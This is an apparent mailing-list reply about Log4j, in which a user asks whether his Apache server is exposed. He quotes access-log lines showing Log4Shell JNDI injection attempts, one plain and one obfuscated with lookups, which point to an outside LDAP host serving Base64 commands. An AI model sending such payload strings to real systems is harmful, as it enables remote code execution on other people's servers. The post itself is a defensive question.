Michael Voorhis <mvoorhis@mcvau.net> writes:
Log4j is a Java logging library. If you're running apache and not using Java, I don't think you need to be concerned.
See here...
Interesting link, thanks for that. I don't use Java, but is Apache using it without my knowledge? NB: I am a bear of little brain. -- Pooh I can't. I don't know how it works! -- OZ I find in /var/log/httpd/access_log 95.54.160.149 - - [15/Dec/2021:12:59:07 -0500] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1c ... ... "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}: //195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgL ... ... So they are trying. How can tell if they succeeded? I have "gij" installed (by distro). I didn't know that two hours ago. What would break if I just deleted that? -- Keith